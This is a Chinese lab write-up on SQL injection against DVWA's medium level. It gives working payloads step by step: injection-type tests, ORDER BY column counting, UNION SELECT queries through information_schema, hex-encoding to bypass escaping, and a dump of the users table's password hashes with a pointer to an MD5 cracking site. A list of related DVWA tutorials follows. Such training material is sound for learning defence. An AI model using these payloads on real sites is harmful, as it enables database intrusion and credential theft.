DVWA SQL注入(medium)

原创 已于 2025-04-02 13:23:23 修改 · 1.6k 阅读 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
cknow-ai fqefeq

cknow-ai 关注

标签
#sql #数据库 #mybatis
分类 信息安全与密码学
于 2025-03-12 10:38:35 首次发布

1.判断注入点是否存在注入

抓包,数据发送到Repeater

将ID值改为引号,查看Response,若不正常返回,则证明与查询语句中的该参数前的引号闭合,存在注入点

2.判断注入类型

若将ID值改为1 and 1 =1,正常返回;改为1 and 1=2,不正常返回,则证明其为数字型注入

若将ID值改为1’and ‘1’ =’1(或1’and 1 =1#),正常返回;改为1’ and’1’=’2(或1’and 1=2#),不正常返回,则证明其为字符型注入(一般用#方法)

(题中皆为不正常返回,证明其不为字符型注入)

3.判断列的长度(order by二分法)

1 order by 10# 结果:unknown

1 order by 5# 结果:unknown

1 order by 3# 结果:unknown

1 order by 2# 结果:正常

说明有2列

大致能判断后台sql语句:select Firstname,Surname from users where user_id=$id

4.判断页面的回显点

输入1 union select 1,2#

后台语句:select Firstname,Surname from users where id=1 union select 1,2#

5. 通过替换来查找想要的信息

输入1 union select 1,version()#

6.爆数据库名

输入-1 union select 1,database()# 得到数据库名称为dvwa

7.爆数据表

-1 union select 1,table_name from information_schema.tables where table_schema='dvwa'#

 ​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​

(图片错误,类似的原图请看标题8,这里图片用的是database()方法)

发生报错,错误信息提示在'\'dvwa\''附近有语法问题,可以尝试将users经十六进制编码为0x64767761以绕过对表名的过滤

爆出两个表:guestbook,users,我们猜测用户名和密码在users表

8.爆字段名

-1 union select 1,column_name from information_schema.columns where table_name='users'#

 

发生报错,错误信息提示在'\'users\''附近有语法问题,可以尝试将users经十六进制编码为0x7573657273以绕过对表名的过滤

 

用户名和密码对应的字段名为user,password

9.爆字段值(真实情况下不要做, dump50条数据违法)

-1 union select user,password from users#

 

结果

First name: admin

Surname:  5f4dcc3b5aa765d61d8327deb882cf99

https://cmd5.com/去解密

 

 

 

点赞 点赞 25
评论 0
书签 书签 15
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 1040
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库及版本信息 7、获取数据库中表信息(group_concat()) 8、获取表字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
【网络安全】DVWASQL注入medium level解题详析
热门推荐
等风来
04-21 1万+
这行代码使用了PHP内置的 mysqli_real_escape_string() 函数对 $id 变量进行转义处理,以防止 SQL 注入攻击。在 Web 应用程序中,当用户在浏览器中提交表单时,浏览器会对数据进行 URL 编码,然后再将编码后的数据发送到后端服务器上。group_concat函数 是 MySQL 中的一个聚集函数,用于将指定列(或表达式)的值以逗号分隔的形式进行拼接。由于字符串’dvwa’中所有的字符均不需要编码,所以URL编码绕过失效。等),剩下的其它所有字符必须通过%xx编码处理。
DVWA sql注入Medium
gclome的博客
07-05 3799
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做mediumSQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
DVWA SQL 注入Medium/High 级别)过滤绕过与防范实验(超详细图文版)
最新发布
2501_91644987的博客
04-03 789
High级别注入点依然存在于 id参数,通过弹窗入口提交 Payload即可成功执行 union查询。无论是查数据库名还是查表名,都被成功获取,证明 High级别只是改变交互方式,并未真正加固 SQL注入防护。正确防御必须使用参数化查询(预编译语句)。
DVWA系列】——Brute Force(暴力破解)——low
一只枷锁的博客
06-04 1080
本文介绍了在DVWA低安全级别环境下使用Burp Suite工具进行暴力破解测试的技术方法。实验步骤包括:1)准备DVWA测试环境;2)配置Burp Suite拦截登录请求;3)标记密码参数并使用Sniper攻击模式;4)加载密码字典实施爆破;5)通过分析响应状态码和长度识别有效密码。文章包含完整的操作截图和详细说明,最终成功通过爆破获取登录凭证。文末特别强调该技术仅限合法授权测试,并附有详尽的法律免责声明,要求读者严格遵守网络安全法律法规和道德规范,仅将技术用于授权环境的安全研究。
DVWA SQL注入(Medium)
qq_61975388的博客
08-18 691
在我们调整安全级别为Medium之后SQL注入变成了如下页面我们发现用户不可以自由输入内容了,那我们就只好通过修改数据包的方式来拼接命令。
DVWA系列】——SQL注入——Medium详细教程
一只枷锁的博客
07-09 1299
本文针对DVWA Medium级别的SQL注入漏洞进行分析,演示了绕过防御机制的手工和自动化注入方法。核心变化在于数字型注入和转义字符防御,需通过BurpSuite修改POST参数或sqlmap工具进行测试。关键技巧包括十六进制编码绕过、注释符使用和联合查询字段匹配。文章强调必须在合法授权下进行测试,遵守最小影响原则和数据保护要求,并附详细免责声明。技术研究仅用于提升系统安全性,禁止非法使用。
kali linux环境下 DVWA SQL注入medium(工具:kali自带的burpsuite)
weixin_51334173的博客
04-13 1014
使用下拉菜单而非文本输入框对输入进行处理单引号(')被转义错误信息被抑制(失败时返回空白页)
DVWA靶场通关笔记-SQL注入(SQL Injection Medium级别)
mooyuan的网络安全博客
05-15 1251
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA通过攻略之SQL注入
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL注入LOW与Medium
ANDTM的博客
04-10 1085
这里我们重点看前几行代码,大概意思就是当我们呈递的东西不为空是,就会把我们呈递的东西赋值给id(代码中蓝色的),此时右边的id(代码中红色的,即加引号的)就是我们输入的东西,没有任何的过滤机制。而在数据库执行时,如select email from member where id=$id,其中 $id 为 我们输入的值 ,如果 输入 1 or 1=1 ,则变成select email from member where id=1 or 1=1 ,SQL注入大概就是这个原理。
DVWA靶场之SQL注入通关详解(1),【绝对干货
m0_61549740的博客
04-07 1552
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 2461
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
DVWASQL注入medium、high
m0_59197314的博客
08-03 413
(1)判断注入是字符型还是数值型。为3时报错,代表字段数为2。(5)获取当前数据库的表名。结果可以使用md5进行爆破。数值型,获得了用户信息。(4)获取当前数据库名。
dvwa靶场中(Medium)安全等级sql注入
白帽小学二年级的博客
12-16 1637
sql注入教程详解 使用burpsuite将抓到的数据包转发到repeater模块 (burpsuite使用前需要将浏览器设置代理 判断是int还是str类型,显然是int类型 用order by关键字进行数据表中列数的判断 1 order by 1,2 //正常显示 1 order by 1,2,3 //报错,所以是两列 1 and 1=2 union select 1,database() //联合注入获取数据库名 1 a...
DVWA-SQL盲注 medium
IWANnaaa的博客
04-03 587
DVWA-MASTER SQL盲注medium
DVWA靶场之SQL注入通关详解,2024年网络安全进阶者的新篇章
m0_61068088的博客
04-05 1196
判断存在SQL注入后,接下来通过order by语句来猜解字段数。当在输入框中输入1’order by 3#时,页面出现不一样的界面,因此这里的字段数有两个。接下来,再通过union select来确定回显位置。如下图所示,回显位置为第二个。获取当前数据库(union select 1,database()),可以得到数据库dvwa
渗透测试之DVWAMedium级别的SQL注入
追风筝的孩子
08-14 6545
Medium SQL Injection Source是通过一个下拉表的方式提交数据的。选择数据后提交,发现URL不是GET注入,是把提交的数据存放到post数据中 先把源代码放出来 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysql_real_e...
DVWA sql注入-MEDIUM
m0_46616663的博客
05-25 631
1.判断是否存在sql注入漏洞 可以看到不是get型数据提交方式了,查询数据也变成了下拉表单的方式。 burpsuite抓包吧那就 常规判断有无注入及其类型 推测有转义符转义 为数字型注入 数据库字段为2 获取数据库信息 1'union select version(),@@version_compile_os# 查询用户名和数据库名 1 union select database(),user()# 爆表...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值